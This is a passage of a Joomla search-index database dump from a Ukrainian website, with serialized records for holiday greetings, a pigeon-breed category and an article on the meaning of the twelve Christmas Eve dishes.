User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2493\";s:5:\"route\";s:76:\"index.php?option=com_content&view=article&id=2493:z-novim-2021-rokom&catid=8\";s:5:\"title\";s:30:\"З Новим 2021 роком!\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-12-29 12:52:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-12-29 12:52:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4771,'index.php?option=com_content&view=category&id=136','index.php?option=com_content&view=category&id=136','Померанські дутиші',' ','2021-01-02 17:20:08','398d250f888b3b5011d669bf8b6795c5',1,1,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2021-01-02 15:20:08','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:3:\"136\";s:5:\"alias\";s:18:\"pomeranski-dutyshi\";s:7:\"summary\";s:1:\"	\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2021-01-02 15:20:08\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:3:\"166\";s:9:\"parent_id\";s:3:\"125\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:22:\"136:pomeranski-dutyshi\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:40:\"/index.php/holuby/136-pomeranski-dutyshi\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=category&id=136\";s:5:\"route\";s:49:\"index.php?option=com_content&view=category&id=136\";s:5:\"title\";s:35:\"Померанські дутиші\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-02 15:20:08\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4773,'index.php?option=com_content&view=article&id=2494','index.php?option=com_content&view=article&id=2494:snidanok-v-novomu-rotsi&catid=136','Сніданок в новому році',' ','2021-01-02 17:24:27','d5f43381c2adc16a974e0208330faa5f',1,1,1,'*','2021-01-02 15:24:22','0000-00-00 00:00:00','2021-01-02 15:24:22','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2494\";s:5:\"alias\";s:23:\"snidanok-v-novomu-rotsi\";s:7:\"summary\";s:297:\"	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/SZ03gAXqa4A\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"136\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-01-02 15:24:27\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:35:\"Померанські дутиші\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:28:\"2494:snidanok-v-novomu-rotsi\";s:7:\"catslug\";s:22:\"136:pomeranski-dutyshi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:65:\"/index.php/holuby/pomeranski-dutyshi/2494-snidanok-v-novomu-rotsi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:35:\"Померанські дутиші\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:35:\"Померанські дутиші\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2494\";s:5:\"route\";s:83:\"index.php?option=com_content&view=article&id=2494:snidanok-v-novomu-rotsi&catid=136\";s:5:\"title\";s:41:\"Сніданок в новому році\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-01-02 15:24:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-02 15:24:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4776,'index.php?option=com_content&view=article&id=2495','index.php?option=com_content&view=article&id=2495:veselikh-rizdvyanikh-svyat&catid=8','Радісних Різдвяних Свят!',' ','2021-01-04 10:26:31','653f0021a9c804d94ff7fbfc7e63e43b',1,1,1,'*','2021-01-06 08:25:38','0000-00-00 00:00:00','2021-01-04 08:25:38','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2495\";s:5:\"alias\";s:26:\"veselikh-rizdvyanikh-svyat\";s:7:\"summary\";s:175:\"		<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/4293668.gif\"><img src=\"https://malehus.in.ua/images/stories/4293668.gif\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-01-04 08:26:31\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:31:\"2495:veselikh-rizdvyanikh-svyat\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:53:\"/index.php/8-novini-2/2495-veselikh-rizdvyanikh-svyat\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2495\";s:5:\"route\";s:84:\"index.php?option=com_content&view=article&id=2495:veselikh-rizdvyanikh-svyat&catid=8\";s:5:\"title\";s:45:\"Радісних Різдвяних Свят!\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-01-06 08:25:38\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-01-04 08:25:38\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4777,'index.php?option=com_content&view=article&id=2496','index.php?option=com_content&view=article&id=2496:shcho-povinno-buti-na-stoli-na-svyat-vechir&catid=8','Що повинно бути на столі на СВЯТ-ВЕЧІР',' Кожна з 12 страв та деякі продукти, які входять до неї, мають глибоке символічне значення, а не просту традиційність. КУТЯ (найголовніша страва на столі, з неї починають трапезу) символізує єднання з Богом і світом померлих. Тому її залишають на ніч для душ усопших, не прибирають зі столу. МАК, який додають до куті, символізує мучеництво Ісуса Христа. МЕД — символ чистоти, надії, оптимізму, солодкого Божого Слова. КОРАЧУН (кругла буханка хліба, інколи домашньої випічки, калач) символізує смерть і воскресіння. ГОРОХ, КВАСОЛЯ — символ християнського життя у \"домашній\", \"сімейній церкві\", символ єдності роду. КАПУСНЯК — символ єдності навколо однієї основи — Христа-Бога. БОРЩ нагадує про дітей, убитих у Вифлеємську ніч за наказом Ірода. ГОЛУБЦІ - символ голуба, який уособлює мир. РИБА — знак християн, один із символів Ісуса Христа. У перших літерах грецького слова \"риба\" зашифровані слова \"Ісус Христос\", \"Спаситель\", \"Син Божий\". ВАРЕНИКИ — достаток, ситність. ГРИБИ — дві природи Ісуса Христа: божественна (шапка) і земна (корінець). ПАМПУШКИ — щастя, здоров\'я, як і вареники — достаток. УЗВАР — життялюдини, дароване Богом. ЧАСНИК — очищення від гріхів. Також символізує здоров\'я. Його кладуть на чотири кутки столу, а потім споживають, щоб зуби не боліли. ','2021-01-06 09:04:13','bc4dcda8203edce3b58e981c2097643b',1,1,1,'*','2021-01-06 07:04:13','0000-00-00 00:00:00','2021-01-06 07:04:13','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2496\";s:5:\"alias\";s:43:\"shcho-povinno-buti-na-stoli-na-svyat-vechir\";s:7:\"summary\";s:2590:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/rizdvo.jpg\"><img src=\"https://malehus.in.ua/images/stories/rizdvo.jpg\" alt=\"\" class=\"fr-fin\" width=\"866\"></a><br></p><p>Кожна з 12 страв та деякі продукти, які входять до неї,  мають глибоке символічне значення, а не просту традиційність.</p><p>КУТЯ (найголовніша страва на столі, з неї починають  трапезу) символізує єднання з Богом і світом померлих. Тому її залишають на ніч  для душ усопших, не прибирають зі столу.</p><p>МАК, який додають до куті, символізує мучеництво Ісуса  Христа.</p><p>МЕД — символ чистоти, надії, оптимізму, солодкого Божого  Слова.</p><p>КОРАЧУН (кругла буханка хліба, інколи домашньої випічки,  калач) символізує смерть і воскресіння.</p><p>ГОРОХ, КВАСОЛЯ — символ християнського життя у  \"домашній\", \"сімейній церкві\", символ єдності роду.</p><p>КАПУСНЯК — символ єдності навколо однієї основи —  Христа-Бога.</p><p>БОРЩ нагадує про дітей, убитих у Вифлеємську ніч за  наказом Ірода.</p><p>ГОЛУБЦІ - символ голуба, який уособлює мир.</p><p>РИБА — знак християн, один із символів Ісуса Христа. У  перших літерах грецького слова \"риба\" зашифровані слова \"Ісус  Христос\", \"Спаситель\", \"Син Божий\".</p><p>ВАРЕНИКИ — достаток, ситність.</p><p>ГРИБИ — дві природи Ісуса Христа: божественна (шапка) і  земна (корінець).</p><p>ПАМПУШКИ — щастя, здоров\'я, як і вареники — достаток.</p><p>УЗВАР — життя людини, дароване Богом.</p><p>ЧАСНИК — очищення від гріхів. Також символізує здоров\'я. Його кладуть на  чотири кутки столу, а потім споживають, щоб зуби не боліли.</p><!--[if !vml]-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-01-06 07:04:13\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"